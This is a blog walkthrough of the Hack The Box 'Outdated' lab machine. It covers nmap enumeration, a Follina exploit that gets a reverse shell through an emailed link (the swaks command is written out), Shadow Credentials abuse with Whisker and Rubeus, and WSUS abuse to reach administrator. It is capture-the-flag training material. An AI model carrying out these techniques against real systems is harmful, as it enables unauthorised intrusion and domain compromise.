In this post, I would like to share a walkthrough of the Outdated Machine from Hack the Box

This room will be considered a Medium machine on Hack The Box

What will you gain from the Outdated machine?

For the user flag, you will need to exploit Folina vulnerability which required us to send a link to an email address collection via SMB.

As for the root flag, you need to abuse the Windows Server Update Service (WSUS) by creating and update a malicious update to the DC and get shell as admin

Information Gathering on Outdated Machine

Once we have started the VPN connection which requires a download from Hackthebox, we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN

┌─[darknite@threatninja]─[~/Documents/htb/Outdated]
└──╼ $nmap -sC -sV 10.10.11.175 -oA intial -Pn 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-29 06:58 EDT
Nmap scan report for outdated.htb (10.10.11.175)
Host is up (0.18s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
25/tcp   open  smtp          hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-08-29 17:58:24Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2022-08-29T17:59:48+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
|_ssl-date: 2022-08-29T17:59:49+00:00; +7h00m00s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
|_ssl-date: 2022-08-29T17:59:48+00:00; +7h00m00s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC.outdated.htb, DNS:outdated.htb, DNS:OUTDATED
| Not valid before: 2022-06-18T05:50:24
|_Not valid after:  2024-06-18T06:00:24
|_ssl-date: 2022-08-29T17:59:49+00:00; +7h00m00s from scanner time.
Service Info: Hosts: mail.outdated.htb, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
| smb2-time: 
|   date: 2022-08-29T17:59:09
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.49 seconds

Let’s access the smbclient

There are a few shares that we can use

Finally, we can access the shares by using the smbclient

However, there’s only one pdf file has been saved over here.

Therefore, let’s download the file into our attacker’s machine.

Inside the PDF file, we can see the content where there’s some information on 5 of the vulnerability listing.

If you notice carefully, there is one vulnerability that we can play on this machine which it’s related to follina vulnerability

Follina Vulnerability

As we are already aware of the vulnerability of follina, I just remind you that John Hammond has released a video that explains this vulnerability (You can watch the video here )

For us to exploit the vulnerability, we can download the python script and nc64.exe file from John Hammond’s Github over here

We are required to modify the exploit on line 111 where change John Hammond’s GitHub URL with your VPN IP Address.

Sadly, the command doesn’t work with just the IP address such as shown on the screenshot above.

Therefore, we can add the syntax such as –interface tun0 –port 80 –reverse <any port that you like to listen>

Let’s start our python server and try to retrieve the nc64.exe from there.

We can trigger the callback by executing the command such as

swaks --to itsupport@outdated.htb --from any_email@domain --server mail.outdated.htb --body "<Your VPN IP address>

Attention: The machine is not really stable to be frankly honest. I need to execute the command above multiple times and even change the VPN IP host.

After a while, we managed to retrieve the reverse connection back to us.

Enumerate the machine using SharpHound

We can enumerate more on the windows machine by using the SharpHound

I notice there is a link that shows AddKeyCredentialLink where we can abuse

We can use the two scripts which is Rubeus and Whisker we will be given some details that we can use for further escalation

  1. GitHub – eladshamir/Whisker: Whisker is a C# tool for taking over Active Directory user and computer accounts by manipulating their msDS-KeyCredentialLink attribute, effectively adding “Shadow Credentials” to the target account.
  2. GitHub – GhostPack/Rubeus: Trying to tame the three-headed dog.

However, we need to self-complied the Whisker where we cannot find the tool saved as .exe file format.

The screenshot shows the output of Whisker.exe and we notice some commands related to the Rubeus tool.

We can execute the same command that we see earlier and it resulted in some details that we can use especially NTLM.

We can read the user flag by typing the “type user.txt” command

Escalate to Root Privileges Access

We managed to notice that We are not even configured under the Administrator group.

Let’s create the payload on the machine

Therefore, we also need to approve the payload

As a result, we can verify the payload where we can see that it’s “Update Info cannot be found”

At last, we can see the “sflowers” user has been added to the Administrators Group

We can read the root flag by typing the “type root.txt” command

Leave a Reply

Your email address will not be published. Required fields are marked *